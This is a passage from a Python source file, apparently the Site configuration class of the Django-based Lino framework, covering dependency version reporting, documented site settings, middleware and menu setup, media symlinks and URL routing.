sphinx version = getattr(sphinx,'__version__','') yield ("Sphinx",version,"http://sphinx-doc.org/") import dateutil version = getattr(dateutil,'__version__','') yield ("python-dateutil",version,"http://labix.org/python-dateutil") #~ try: #~ import Cheetah #~ version = Cheetah.Version #~ yield ("Cheetah",version ,"http://cheetahtemplate.org/") #~ except ImportError: #~ pass try: from odf import opendocument version = opendocument.__version__ except ImportError: version = self.not_found_msg yield ("OdfPy",version ,"http://pypi.python.org/pypi/odfpy") try: import docutils version = docutils.__version__ except ImportError: version = self.not_found_msg yield ("docutils",version ,"http://docutils.sourceforge.net/") try: import suds version = suds.__version__ except ImportError: version = self.not_found_msg yield ("suds",version ,"https://fedorahosted.org/suds/") import yaml version = getattr(yaml,'__version__','') yield ("PyYaml",version,"http://pyyaml.org/") if False: try: import pyratemp version = getattr(pyratemp,'__version__','') except ImportError: version = self.not_found_msg yield ("pyratemp",version,"http://www.simple-is-better.org/template/pyratemp.html") if False: try: import ho.pisa as pisa version = getattr(pisa,'__version__','') yield ("xhtml2pdf",version,"http://www.xhtml2pdf.com") except ImportError: pass try: import reportlab version = reportlab.Version except ImportError: version = self.not_found_msg yield ("ReportLab",version,"http://www.reportlab.org/rl_toolkit.html") try: #~ import appy from appy import version version = version.verbose except ImportError: version = self.not_found_msg yield ("Appy",version ,"http://appyframework.org/pod.html") #~ for p in self.installed_plugins if ui and self.use_extjs: #~ version = '<script type="text/javascript">document.write(Ext.version);</script>' onclick = "alert('ExtJS client version is ' + Ext.version);" tip = "Click to see ExtJS client version" text = "(version)" #~ version = """<a href="#" onclick="%s" title="%s">%s</a>""" % (onclick,tip,text) version = E.a(text,href='#',onclick=onclick,title=tip) yield ("ExtJS",version ,"http://www.sencha.com") if self.use_extensible: onclick = "alert('Extensible Calendar version is ' + Ext.ensible.version);" tip = "Click to see Extensible Calendar version" text = "(version)" #~ version = """<a href="#" onclick="%s" title="%s">%s</a>""" % (onclick,tip,text) version = E.a(text,href='#',onclick=onclick,title=tip) yield ("Extensible",version ,"http://ext.ensible.com/products/calendar/") yield ("Silk Icons",'1.3',"http://www.famfamfam.com/lab/icons/silk/") def get_db_overview_rst(self): """ Returns a reStructredText-formatted "database overview" report. Used by the :mod:`diag <lino.management.commands.diag>` command and in test cases. """ from atelier import rstgen from lino.core.dbutils import obj2str, full_model_name, sorted_models_list, app_labels #~ writeln("Lino %s" % lino.__version__) #~ yield (settings.SITE.verbose_name, settings.SITE.version) #~ writeln(settings.SITE.title) models_list = sorted_models_list() apps = app_labels() s = "%d applications: %s." % (len(apps), ", ".join(apps)) s += "\n%d models:\n" % len(models_list) i = 0 headers = [ #~ "No.", "Name", #~ "Class", #~ "M", "#fields", "#rows", #~ ,"first","last" ] rows = [] for model in models_list: if model._meta.managed: i += 1 cells = [] #~ cells.append(str(i)) cells.append(full_model_name(model)) #~ cells.append(str(model)) #~ if model._meta.managed: #~ cells.append('X') #~ else: #~ cells.append('') cells.append(str(len(model._meta.fields))) #~ qs = model.objects.all() qs = model.objects.order_by('pk') n = qs.count() cells.append(str(n)) #~ if n: #~ cells.append(obj2str(qs[0])) #~ cells.append(obj2str(qs[n-1])) #~ else: #~ cells.append('') #~ cells.append('') rows.append(cells) s += rstgen.table(headers,rows) return s partners_app_label = 'contacts' """ Temporary setting, see :ref:`polymorphism`. """ # three constants used by lino.modlib.workflows: max_state_value_length = 20 max_action_name_length = 50 max_actor_name_length = 100 trusted_templates = False """ Set this to True if you are sure that the users of your site won't try to misuse Jinja's capabilities. """ #~ def add_config_value(self,name,default,help_text): #~ if not hasattr(self,name): #~ setattr(self,name,default) #~ add_config_value('allow_duplicate_cities',False) allow_duplicate_cities = False """ In a default configuration (when :attr:`allow_duplicate_cities` is False), Lino declares a UNIQUE clause for :class:`Cities <lino.modlib.countries.models.Cities>` to make sure that your database never contains duplicate cities. This behaviour mighr disturb e.g. when importing legacy data that did not have this restriction. Set it to True to remove the UNIQUE clause. Changing this setting might affect your database structure and thus require a :doc:`/topics/datamig` if your application uses :mod:`lino.modlib.countries`. """ uid = 'myuid' """ A universal identifier for this Site. This is needed when synchronizing with CalDAV server. Locally created calendar components in remote calendars will get a UID based on this parameter, using ``"%s@%s" (self.pk,settings.SITE.ui)``. The default value is ``'myuid'``, and you should certainly override this on a production server that uses remote calendars. """ #~ person_model = None #~ person_model = "contacts.Person" #~ """ #~ If your application uses :model:`lino.modlib.contacts`, #~ set this to a string "applabel.Modelname" which identifies #~ your Person model (which should inherit from #~ :class:`lino.modlib.contacts.models.Person`). #~ """ #~ company_model = None #~ company_model = "contacts.Company" #~ """ #~ If your application uses :model:`lino.modlib.contacts`, #~ set this to a string "applabel.Modelname" which identifies #~ your Company model (which should inherit from #~ :class:`lino.modlib.contacts.models.Company`). #~ """ project_model = None #~ user_model = "users.User" user_model = None auth_middleware = None legacy_data_path = None """ Used by custom fixtures that import data from some legacy database. """ propvalue_max_length = 200 """ Used by :mod:`lino.modlib.properties`. """ never_build_site_cache = False """ Set this to `True` if you want that Lino never (re)builds the site cache (even when asked). This can be useful on a development server when you are debugging directly on the generated :xfile:`lino*.js`. Or for certain unit test cases. """ show_internal_field_names = False """ Whether the internal field names should be visible. Default is `False`. ExtUI implements this by prepending them to the tooltip, which means that :attr:`use_quicktips` must also be `True`. """ build_js_cache_on_startup = None """ Whether the Javascript cache files should be built on startup for all user profiles and languages. On a production server this should be `True` for best performance, but while developing, it may be easier to set it to `False`, which means that each file is built upon need (when a first request comes in). The default value `None` means that Lino decides automatically during startup: it becomes `False` if either :func:`lino.core.dbutils.is_devserver` returns True or setting:`DEBUG` is set. """ #~ replace_django_templates = True #~ """ #~ Whether to replace Djano's template engine by Jinja. #~ """ use_experimental_features = False """ Whether to include "experimental" features. """ site_config_defaults = {} """ Default values to be used when creating the :class:`lino.models.SiteConfig` instance. Usage example:: site_config_defaults = dict(default_build_method='appypdf') """ is_demo_site = True """ When this is `True`, then this site runs in "demo" mode. "Demo mode" means: - the welcome text for anonymous users says "This demo site has X users, they all have "1234" as password", followed by a list of available usernames. Default value is `True`. On a production site you will of course set this to `False`. See also :attr:`demo_fixtures`. """ demo_email = '[email protected]' """ """ demo_fixtures = ['std','demo','demo2'] """ The list of fixtures to be loaded by the :mod:`initdb_demo <lino.management.commands.initdb_demo>` command. """ use_spinner = False # doesn't work. leave this to False #~ django_admin_prefix = '/django' django_admin_prefix = None """ The prefix to use for Django admin URLs. Leave this unchanged as long as :doc:`/tickets/70` is not solved. """ start_year = 2011 plain_prefix = 'plain' #~ admin_prefix = 'admin' admin_prefix = '' use_extjs = True time_format_extjs = 'H:i' """ Format (in ExtJS syntax) to use for displaying dates to the user. If you change this setting, you also need to override :meth:`parse_time`. """ date_format_extjs = 'd.m.Y' """ Format (in ExtJS syntax) to use for displaying dates to the user. If you change this setting, you also need to override :meth:`parse_date`. """ alt_date_formats_extjs = 'd/m/Y|Y-m-d' """ Alternative date entry formats accepted by ExtJS Date widgets. """ #~ default_number_format_extjs = '0,000.00/i' default_number_format_extjs = '0,00/i' uppercase_last_name = False """ Whether last name of persons should be printed with uppercase letters. See :mod:`lino.test_apps.human` """ extjs_root = None """ Path to the ExtJS root directory. Only used when :attr:`extjs_base_url` is None, and when the `media` directory has no symbolic link named `extjs` pointing to the ExtJS root directory. """ extjs_base_url = "http://extjs-public.googlecode.com/svn/tags/extjs-3.3.1/release/" """ The URL from where to include the ExtJS library files. The default value points to the `extjs-public <http://code.google.com/p/extjs-public/>`_ repository and thus requires the clients to have an internet connection. This relieves newcomers from the burden of having to specify a download location in their :xfile:`settings.py`. On a production site you'll probably want to download and serve these files yourself by setting this to `None` and setting :attr:`extjs_root` (or a symbolic link "extjs" in your :xfile:`media` directory) to point to the local directory where ExtJS 3.3.1 is installed). The same rules apply to the attributes :attr:`extensible_base_url <lino.site.Site.extensible_base_url>`, :attr:`bootstrap_base_url <lino.site.Site.bootstrap_base_url>` and :attr:`tinymce_base_url <lino.site.Site.tinymce_base_url>`. """ extensible_base_url = "http://ext.ensible.com/deploy/1.0.2/" "Similar to :attr:`extjs_base_url` but pointing to ext.ensible.com." bootstrap_base_url = "http://twitter.github.com/bootstrap/assets/" "Similar to :attr:`extjs_base_url` but pointing to twitter.github.com." tinymce_base_url = "http://www.tinymce.com/js/tinymce/jscripts/tiny_mce/" "Similar to :attr:`extjs_base_url` but pointing to http://www.tinymce.com." bootstrap_root = None """ Path to the Jasmine root directory. Only used on a development server whose `media` directory hasn't already a symbolic link or subdirectory, and only if :attr:`use_bootstrap` is True. """ jasmine_root = None """ Path to the Jasmine root directory. Only used on a development server if the `media` directory has no symbolic link to the Jasmine root directory and only if :attr:`use_jasmine` is True. """ extensible_root = None """ Path to the Extensible root directory. Only used on a development server if the `media` directory has no symbolic link to the Extensible root directory, and only if :attr:`use_extensible` is True. """ tinymce_root = None """ Path to the tinymce root directory. Only to be used on a development server if the `media` directory has no symbolic link to the TinyMCE root directory, and only if :attr:`use_tinymce` is True. """ eid_jslib_root = None """ Path to the `eid_jslib` root directory. Only to be used on a development server if the `media` directory has no symbolic link to the directory, and only if :attr:`use_eid_jslib` is True. http://code.google.com/p/eid-javascript-lib/ """ default_user = None """ Username to be used if a request with no REMOTE_USER header makes its way through to Lino. Which may happen on a development server and if Apache is configured to allow it. Used by :mod:`lino.core.auth`. """ anonymous_user_profile = '000' """ The UserProfile to be assigned to anonymous user. """ #~ remote_user_header = "REMOTE_USER" remote_user_header = None ldap_auth_server = None #~ simulate_remote_user = False use_gridfilters = True use_eid_applet = False """ Whether to include functionality to read Belgian id cards using the official `eid-applet <http://code.google.com/p/eid-applet>`_. This option is experimental and doesn't yet work. See `/blog/2012/1105`. """ use_eid_jslib = False """ Whether to include functionality to read Belgian id cards using Johan De Schutter's `eid-javascript-lib <http://code.google.com/p/eid-javascript-lib/>`_. If this is True, Lino expects eid-javascript-lib to be installed in a directory `media/beid-jslib`. See also :attr:`eid_jslib_root`. """ use_esteid = False """ Whether to include functionality to read Estonian id cards. This option is experimental and doesn't yet work. """ use_filterRow = not use_gridfilters """ See `/blog/2011/0630`. This option was experimental and doesn't yet work (and maybe never will). """ use_awesome_uploader = False """ Whether to use AwesomeUploader. This option was experimental and doesn't yet work (and maybe never will). """ use_tinymce = True """ Whether to use TinyMCE instead of Ext.form.HtmlEditor. See also :attr:`tinymce_root`. See `/blog/2011/0523`. """ use_bootstrap = True """ Whether to use the `Bootstrap <http://twitter.github.com/bootstrap>`_ CSS toolkit. """ use_jasmine = False """ Whether to use the `Jasmine <https://github.com/pivotal/jasmine>`_ testing library. """ use_extensible = True """ Whether to use the `Extensible <http://ext.ensible.com>`_ calendar library. """ use_quicktips = True """ Whether to make use of `Ext.QuickTips <http://docs.sencha.com/ext-js/3-4/#!/api/Ext.QuickTips>`_ when displaying :ref:`help_texts`. """ use_css_tooltips = False """ Whether to make use of CSS tooltips when displaying help texts defined in :class:`lino.models.HelpText`. """ use_vinylfox = False """ Whether to use VinylFox extensions for HtmlEditor. This feature was experimental and doesn't yet work (and maybe never will). See `/blog/2011/0523`. """ webdav_root = None """ The path on server to store webdav files. Default is "PROJECT_DIR/media/webdav". """ webdav_url = None """ The URL prefix for webdav files. In a normal production configuration you should leave this to `None`, Lino will set a default value "/media/webdav/", supposing that your Apache is configured as described in :doc:`/admin/webdav`. This may be used to simulate a :term:`WebDAV` location on a development server. For example on a Windows machine, you may set it to ``w:\``, and before invoking :term:`runserver`, you issue in a command prompt:: subst w: <dev_project_path>\media\webdav """ #~ use_eidreader = False #~ """ #~ Set this to `True` if this site should feature using :ref:`eidreader`. #~ """ use_davlink = False #~ max_auto_events = 72 #~ """ #~ Maximum number of automatic events to be generated. #~ """ #~ mergeable_models = [] #~ """ #~ A list of models that should have a "Merge" action #~ (see :mod:`lino.mixins.mergeable`). #~ """ override_modlib_models = None sidebar_width = 0 """ Width of the sidebar in 1/12 of total screen width. Meaningful values are 0 (no sidebar), 2 or 3. """ # for internal use: #~ _extjs_ui = None #~ _groph_ui = None _site_config = None def override_defaults(self,**kwargs): """ """ #~ logger.info("20130404 lino.site.Site.override_defaults") super(Site,self).override_defaults(**kwargs) installed_apps = tuple(self.get_installed_apps()) + ('lino','djangosite') installed_apps = tuple([str(x) for x in installed_apps]) self.update_settings(INSTALLED_APPS=installed_apps) if self.override_modlib_models is None: self.override_modlib_models = set() from django.utils.importlib import import_module for n in installed_apps: m = import_module(n) app = getattr(m,'App',None) if app is not None: if app.extends_models is not None: for m in app.extends_models: self.override_modlib_models.add(m) #~ fd = list() #~ self.update_settings(FIXTURE_DIRS=tuple(settings_subdirs('fixtures'))) if self.webdav_url is None: self.webdav_url = '/media/webdav/' if self.webdav_root is None: self.webdav_root = join(abspath(self.project_dir),'media','webdav') if not self.django_settings.get('MEDIA_ROOT',False): """ Django's default value for MEDIA_ROOT is an empty string. In certain test cases there migth be no MEDIA_ROOT key at all. Lino's default value for MEDIA_ROOT is ``<project_dir>/media``. """ self.django_settings.update(MEDIA_ROOT=join(self.project_dir,'media')) self.update_settings( ROOT_URLCONF = 'lino.ui.urls' ) self.update_settings( MEDIA_URL = '/media/' ) self.update_settings( TEMPLATE_LOADERS=tuple([ 'lino.core.web.Loader', 'django.template.loaders.filesystem.Loader', 'django.template.loaders.app_directories.Loader', #~ 'django.template.loaders.eggs.Loader', ])) tcp = [] if self.user_model == 'auth.User': self.update_settings(LOGIN_URL = '/accounts/login/') self.update_settings(LOGIN_REDIRECT_URL = "/") tcp += [ 'django.contrib.auth.context_processors.auth' ] tcp += [ 'django.core.context_processors.debug', 'django.core.context_processors.i18n', 'django.core.context_processors.media', 'django.core.context_processors.static', # 'django.core.context_processors.request', #~ 'django.contrib.messages.context_processors.messages', ] self.update_settings(TEMPLATE_CONTEXT_PROCESSORS = tuple(tcp)) self.define_settings( MIDDLEWARE_CLASSES=tuple(self.get_middleware_classes())) #~ print 20130313, self.django_settings['MIDDLEWARE_CLASSES'] #~ def get_plugins(self): #~ from lino.ui.ui import ExtUI #~ yield ExtUI() #~ def do_site_startup(self): #~ raise Exception("20130302") #~ try: #~ super(Site,self).do_site_startup() #~ if True: #~ self.ui = #~ except Exception as e: #~ import traceback #~ traceback.print_exc(e) #~ sys.exit(-10) #~ raise Exception("20130302") def is_abstract_model(self,name): """ Return True if the named model ("myapp.MyModel") is declared in :attr:`override_modlib_models`. """ return name in self.override_modlib_models def is_imported_partner(self,obj): """ Return whether the specified :class:`Partner <lino.modlib.contacts.models.Partner>` instance `obj` is to be considered as imported from some legacy database. """ #~ return obj.id is not None and (obj.id < 200000 or obj.id > 299999) return False #~ return obj.id is not None and (obj.id > 10 and obj.id < 21) def site_header(self): """ Used in footnote or header of certain printed documents. The convention is to call it as follows from an appy.pod template (use the `html` function, not `xhtml`) :: do text from html(settings.SITE.site_header()) Note that this is expected to return a unicode string possibly containing valid HTML (not XHTML) tags for formatting. """ if self.is_installed('contacts'): if self.site_config.site_company: return self.site_config.site_company.get_address('<br/>') #~ s = unicode(self.site_config.site_company) + " / " + s #~ return '' def setup_main_menu(self): """ To be implemented by applications. """ pass #~ @property #~ def site_config(self): #~ SiteConfig = self.modules.system.SiteConfig #~ try: #~ return SiteConfig.objects.get(pk=1) #~ except SiteConfig.DoesNotExist: #~ kw = dict(pk=1) #~ kw.update(self.site_config_defaults) #~ sc = SiteConfig(**kw) #~ sc.full_clean() #~ sc.save() #~ return sc @property def site_config(self): """ Returns the one and only :class:`lino.modlib.system.models.SiteConfig` instance which contains Site configuration parameters which are stored in the database and editable using the web interface. If no instance exists (which happens in a virgin database), we create it using default values from :attr:`site_config_defaults`. """ if self._site_config is None: #~ raise Exception(20130301) #~ print '20130320 create _site_config' #~ from lino.core.dbutils import resolve_model #~ from lino.core.dbutils import obj2str #~ from lino.utils import dblogger as logger #~ SiteConfig = resolve_model('system.SiteConfig') SiteConfig = self.modules.system.SiteConfig #~ from .models import SiteConfig #~ from django.db.utils import DatabaseError try: #~ self._site_config = SiteConfig.real_objects.get(pk=1) self._site_config = SiteConfig.real_objects.get(pk=self.config_id) #~ print "20130301 Loaded SiteConfig record", obj2str(self._site_config,True) #~ except (SiteConfig.DoesNotExist,DatabaseError): except SiteConfig.DoesNotExist: #~ except Exception,e: kw = dict(pk=self.config_id) #~ kw.update(settings.SITE.site_config_defaults) kw.update(self.site_config_defaults) self._site_config = SiteConfig(**kw) #~ print "20130301 Created SiteConfig record", obj2str(self._site_config,True) # 20120725 # polls_tutorial menu selection `Config --> Site Parameters` # said "SiteConfig 1 does not exist" # cannot save the instance here because the db table possibly doesn't yet exit. #~ self._site_config.save() return self._site_config #~ site_config = property(get_site_config) #~ def shutdown(self): #~ self.clear_site_config() #~ return super(Site,self).shutdown() def clear_site_config(self): """ Clear the cached SiteConfig instance. This is needed e.g. when the test runner has created a new test database. """ self._site_config = None #~ print "20130320 clear_site_config" #~ def on_site_config_saved(self,sc): #~ """ #~ Used internally. Called by SiteConfig.save() to update the cached instance. #~ """ #~ pass #~ self._site_config = sc #~ from lino.core.dbutils import obj2str #~ print '20120801 site_config saved', obj2str(sc,True) def is_imported_partner(self,obj): """ Return whether the specified :class:`Partner <lino.modlib.contacts.models.Partner>` instance `obj` is to be considered as imported from some legacy database. """ #~ return obj.id is not None and (obj.id < 200000 or obj.id > 299999) return False #~ return obj.id is not None and (obj.id > 10 and obj.id < 21) def get_quicklinks(self,ar): from lino.core import menus m = menus.Toolbar(ar.get_user().profile,'quicklinks') self.setup_quicklinks(ar,m) return m def get_site_menu(self,ui,profile): """ Return this site's main menu for the given UserProfile. Must be a :class:`lino.core.menus.Toolbar` instance. Applications usually should not need to override this. """ from django.utils.translation import ugettext_lazy as _ from lino.core import menus main = menus.Toolbar(profile,'main') self.setup_menu(ui,profile,main) main.compress() #~ url = self.admin_url #~ if not url: #~ url = "/" #~ main.add_url_button(url,label=_("Home")) #~ url = "javascript:Lino.close_all_windows()" #~ main.add_url_button(url,label=_("Home")) return main def setup_quicklinks(self,ar,m): """ Override this in application-specific (or even local) :xfile:`settings.py` files to define a series of *quick links* to appear below the main menu bar. Example see :meth:`lino.projects.pcsw.settings.Site.setup_quicklinks`. """ self.on_each_app('setup_quicklinks',ar,m) def setup_menu(self,ui,profile,main): """ Set up the application's menu structure. The default implementation uses a system of predefined top-level items that are filled by the different :setting:`INSTALLED_APPS`. To use this system, application programmers define one or several of the following functions in their `models` module: - `setup_master_menu` - `setup_main_menu` - `setup_reports_menu` - `setup_config_menu` - `setup_explorer_menu` - `setup_site_menu` These functions, if present, will be called with three positional arguments: `ui`, `profile` and `menu`. Deserves more documentation. """ from django.utils.translation import ugettext_lazy as _ m = main.add_menu("master",_("Master")) self.on_each_app('setup_master_menu',ui,profile,m) #~ if not profile.readonly: #~ m = main.add_menu("my",_("My menu")) #~ self.on_each_app('setup_my_menu',ui,profile,m) self.on_each_app('setup_main_menu',ui,profile,main) m = main.add_menu("reports",_("Reports")) self.on_each_app('setup_reports_menu',ui,profile,m) m = main.add_menu("config",_("Configure")) self.on_each_app('setup_config_menu',ui,profile,m) m = main.add_menu("explorer",_("Explorer")) self.on_each_app('setup_explorer_menu',ui,profile,m) m = main.add_menu("site",_("Site")) self.on_each_app('setup_site_menu',ui,profile,m) return main def get_middleware_classes(self): """ Yields the strings to be stored in the :setting:`MIDDLEWARE_CLASSES` setting. In case you don't want to use this method for defining :setting:`MIDDLEWARE_CLASSES`, you can simply set :setting:`MIDDLEWARE_CLASSES` in your :xfile:`settings.py` after the :class:`lino.site.Site` has been instantiated. `Django and standard HTTP authentication <http://stackoverflow.com/questions/152248/can-i-use-http-basic-authentication-with-django>`_ """ yield 'django.middleware.common.CommonMiddleware' #~ yield 'django.contrib.sessions.middleware.SessionMiddleware' if self.languages and len(self.languages) > 1: yield 'django.middleware.locale.LocaleMiddleware' #~ yield 'django.contrib.auth.middleware.AuthenticationMiddleware' #~ if self.user_model: #~ if self.user_model is None: #~ yield 'lino.core.auth.NoUserMiddleware' #~ elif self.remote_user_header: if self.auth_middleware: yield self.auth_middleware else: if self.user_model is None: yield 'lino.core.auth.NoUserMiddleware' elif self.remote_user_header: yield 'lino.core.auth.RemoteUserMiddleware' #~ yield 'django.middleware.doc.XViewMiddleware' else: # not using remote http auth, so we need sessions yield 'django.contrib.sessions.middleware.SessionMiddleware' if self.ldap_auth_server: yield 'lino.core.auth.LDAPAuthMiddleware' else: yield 'lino.core.auth.SessionUserMiddleware' #~ raise Exception("""\ #~ `user_model` is not None, but no `remote_user_header` in your settings.SITE.""") #~ yield 'lino.utils.editing.EditingMiddleware' if True: yield 'lino.utils.ajax.AjaxExceptionResponse' if False: # not BYPASS_PERMS: yield 'django.contrib.auth.middleware.RemoteUserMiddleware' # TODO: find solution for this: #~ AUTHENTICATION_BACKENDS = ( #~ 'django.contrib.auth.backends.RemoteUserBackend', #~ ) if False: #~ yield 'lino.utils.sqllog.ShortSQLLogToConsoleMiddleware' yield 'lino.utils.sqllog.SQLLogToConsoleMiddleware' #~ yield 'lino.utils.sqllog.SQLLogMiddleware' def get_main_action(self,profile): """ Return the action to show as top-level "index.html". The default implementation returns `None`, which means that Lino will call :meth:`get_main_html`. """ return None def get_main_html(self,request): """ Return a chunk of html to be displayed in the main area of the admin index. This is being called only if :meth:`get_main_action` returns `None`. The default implementation renders the :xfile:`admin_main.html` template. """ from lino.core import web return web.render_from_request(request,'admin_main.html') def get_welcome_messages(self,ar): """ Return or yield a list of messages to display for welcome. """ for a in self._welcome_actors: for msg in a.get_welcome_messages(ar): yield msg def get_todo_tables(self,ar): """ Return or yield a list of tables that should be empty """ from django.db import models for app_module in models.get_apps(): meth = getattr(app_module,'get_todo_tables',None) if meth is not None: #~ dblogger.debug("Running %s of %s", methname, mod.__name__) for table,text in meth(ar): if isinstance(table,basestring): table = self.modules.resolve(table) if table.default_action.get_view_permission(ar.get_user().profile): if table.default_action.get_row_permission(ar,None,None): #~ if table.default_action.get_bound_action_permission(ar,None,None): if text is None: text = "%d " + unicode(table.label) yield (table,text) def get_installed_apps(self): #~ yield 'lino.ui' if self.user_model is not None and self.remote_user_header is None: yield 'django.contrib.sessions' # 20121103 if self.django_admin_prefix: yield 'django.contrib.admin' #~ 'django.contrib.markup', #~ yield 'django_extensions' yield 'lino.modlib.about' #~ if self.admin_prefix: #~ yield 'lino.modlib.pages' for a in self.user_apps: yield a #~ def get_guest_greeting(self): #~ return E.p("Please log in") site_prefix = '/' """ This must be set if your project is not sitting at the "root" URL of your server. It must start *and* end with a *slash*. Default value is ``'/'``. For example if you have:: WSGIScriptAlias /foo /home/luc/mypy/lino_sites/foo/wsgi.py Then your :xfile:`settings.py` should specify:: site_prefix = '/foo/' See also :ref:`mass_hosting`. """ def buildurl(self,*args,**kw): #~ url = '/' + ("/".join(args)) url = self.site_prefix + ("/".join(args)) if len(kw): url += "?" + urlencode(kw) return url def build_admin_url(self,*args,**kw): if self.admin_prefix: return self.buildurl(self.admin_prefix,*args,**kw) return self.buildurl(*args,**kw) def build_media_url(self,*args,**kw): return self.buildurl('media',*args,**kw) def build_plain_url(self,*args,**kw): if self.plain_prefix: return self.buildurl('plain',*args,**kw) return self.buildurl(*args,**kw) #~ return self.plain_prefix + self.buildurl(*args,**kw) def build_extjs_url(self,url): if self.extjs_base_url: return self.extjs_base_url + url return self.build_media_url('extjs',url) def build_extensible_url(self,url): if self.extensible_base_url: return self.extensible_base_url + url return self.build_media_url('extensible',url) def build_bootstrap_url(self,url): if self.bootstrap_base_url: return self.bootstrap_base_url + url return self.build_media_url('bootstrap',url) def build_tinymce_url(self,url): if self.tinymce_base_url: return self.tinymce_base_url + url return self.build_media_url('tinymce',url) def get_system_note_recipients(self,ar,obj,silent): """ Return or yield a list of recipients (i.e. strings "Full Name <[email protected]>" ) to be notified by email about a system note issued by action request `ar` about the object instance `obj`. Default behaviour is to simply forwar it to the `obj`'s :meth:`get_system_note_recipients <lino.core.model.Model.get_system_note_recipients>`, but here is a hook to define local exceptions to the application specific default rules. """ return obj.get_system_note_recipients(ar,silent) def welcome_html(self,ui=None): """ Return a HTML version of the "This is APPLICATION version VERSION using ..." text. to be displayed in the About dialog, in the plain html footer, and maybe at other places. """ from django.utils.translation import ugettext as _ p = [] sep = '' if self.verbose_name: p.append(_("This is ")) if self.url: p.append(E.a(self.verbose_name,href=self.url,target='_blank')) else: p.append(E.b(self.verbose_name)) if self.version: p.append(' ') p.append(self.version) sep = _(' using ') for name,version,url in self.using(True): p.append(sep) p.append(E.a(name,href=url,target='_blank')) p.append(' ') p.append(version) sep = ', ' return E.span(*p) #~ def welcome_html(self,ui=None): #~ """ #~ Text to display in the "about" dialog of a GUI application. #~ """ #~ sep = '<br/>' #~ kw = dict(me=self.site_version(), #~ using = sep.join(['<a href="%s" target="_blank">%s</a>&nbsp;%s' #~ % (u,n,v) for n,v,u in self.using(ui)])) #~ return "This is %(me)s using %(using)s." % kw def login(self,username=None,**kw): """ For usage from a shell. The :meth:`login <lino.site.Site.login>` method doesn't require any password because when somebody has command-line access we trust that she has already authenticated. It returns a :class:`BaseRequest <lino.core.requests.BaseRequest>` object which has a :meth:`show <lino.core.requests.BaseRequest.show>` method. """ if username is None: if not kw.has_key('user'): from lino.core.auth import AnonymousUser kw.update(user=AnonymousUser.instance()) else: kw.update(user=self.user_model.objects.get(username=username)) if not kw.has_key('renderer'): kw.update(renderer=self.ui.text_renderer) from lino.core import requests import lino.ui.urls # hack: trigger ui instantiation #~ if u.language: #~ from north.dbutils import set_language #~ set_language(u.language) return requests.BaseRequest(**kw) def get_media_urls(self): #~ print "20121110 get_media_urls" from django.conf.urls import patterns, url, include from lino.core.dbutils import is_devserver from django.conf import settings urlpatterns = [] logger.debug("Checking /media URLs ") prefix = settings.MEDIA_URL[1:] if not prefix.endswith('/'): raise Exception("MEDIA_URL %r doesn't end with a '/'!" % settings.MEDIA_URL) def setup_media_link(short_name,attr_name=None,source=None): target = join(settings.MEDIA_ROOT,short_name) if exists(target): #~ logger.info("20130409 path exists: %s",target) return if attr_name is not None: source = getattr(self,attr_name) if not source: raise Exception( "%s does not exist and SITE.%s is not set." % ( target,attr_name)) if not exists(source): raise Exception("SITE.%s (%s) does not exist" % (attr_name,source)) elif not exists(source): raise Exception("%s does not exist" % source) if is_devserver(): #~ logger.info("django.views.static serving /%s%s from %s",prefix,short_name,source) urlpatterns.extend(patterns('django.views.static', (r'^%s%s/(?P<path>.*)$' % (prefix,short_name), 'serve', { 'document_root': source, 'show_indexes': False }))) else: symlink = getattr(os,'symlink',None) if symlink is None: logger.info("Cannot create symlink %s -> %s.",target,source) #~ raise Exception("Cannot run a production server on an OS that doesn't have symlinks") else: logger.info("Create symlink %s -> %s.",target,source) symlink(source,target) if not self.extjs_base_url: setup_media_link('extjs','extjs_root') if self.use_bootstrap: if not self.bootstrap_base_url: setup_media_link('bootstrap','bootstrap_root') #~ else: #~ logger.info("20130409 self.bootstrap_base_url is %s",self.bootstrap_base_url) #~ else: #~ logger.info("20130409 self.use_bootstrap is False") if self.use_extensible: if not self.extensible_base_url: setup_media_link('extensible','extensible_root') if self.use_tinymce: if not self.tinymce_base_url: setup_media_link('tinymce','tinymce_root') if self.use_jasmine: setup_media_link('jasmine','jasmine_root') if self.use_eid_jslib: setup_media_link('eid-jslib','eid_jslib_root') #~ setup_media_link('lino',source=join(dirname(lino.__file__),'..','media')) try: setup_media_link('lino',source=resource_filename(Requirement.parse("lino"),"lino/media")) except DistributionNotFound as e: # if it is not installed using pip, link directly to the source tree setup_media_link('lino',source=join(dirname(lino.__file__),'media')) #~ logger.info("20130409 is_devserver() returns %s.",is_devserver()) if is_devserver(): urlpatterns += patterns('django.views.static', (r'^%s(?P<path>.*)$' % prefix, 'serve', { 'document_root': settings.MEDIA_ROOT, 'show_indexes': True }), ) return urlpatterns def get_pages_urls(self): from django.conf.urls import patterns, url, include from django import http from django.views.generic import View from lino import dd pages = dd.resolve_app('pages') class PagesIndex(View): def get(self, request,ref='index'): if not ref: ref = 'index' #~ print 20121220, ref obj = pages.lookup(ref,None) if obj is None: raise http.Http404("Unknown page %r" % ref) html = pages.render_node(request,obj) return http.HttpResponse(html) return patterns('', (r'^(?P<ref>\w*)$', PagesIndex.as_view()), ) def get_plain_urls(self): from django.conf.urls import patterns, url, include from lino.ui import views urlpatterns = [] rx = '^' urlpatterns = patterns('', (rx+r'$', views.PlainIndex.as_view()), (rx+r'(?P<app_label>\w+)/(?P<actor>\w+)$', views.PlainList.as_view()), (rx+r'(?P<app_label>\w+)/(?P<actor>\w+)/(?P<pk>.+)$', views.PlainElement.as_view()), ) return urlpatterns def get_ext_urls(self): from django.conf.urls import patterns, url, include from lino.ui import views #~ print "20121110 get_urls" self.ui.ext_renderer.build_site_cache() rx = '^' urlpatterns = patterns('', (rx+'$', views.AdminIndex.as_view()), (rx+r'api/main_html$', views.MainHtml.as_view()), (rx+r'auth$', views.Authenticate.as_view()), (rx+r'grid_config/(?P<app_label>\w+)/(?P<actor>\w+)$', views.GridConfig.as_view()), (rx+r'api/(?P<app_label>\w+)/(?P<actor>\w+)$', views.ApiList.as_view()), (rx+r'api/(?P<app_label>\w+)/(?P<actor>\w+)/(?P<pk>.+)$', views.ApiElement.as_view()), (rx+r'restful/(?P<app_label>\w+)/(?P<actor>\w+)$', views.Restful.as_view()), (rx+r'restful/(?P<app_label>\w+)/(?P<actor>\w+)/(?P<pk>.+)$', views.Restful.as_view()), (rx+r'choices/(?P<app_label>\w+)/(?P<rptname>\w+)$', views.Choices.as_view()), (rx+r'choices/(?P<app_label>\w+)/(?P<rptname>\w+)/(?P<fldname>\w+)$', views.Choices.as_view()), 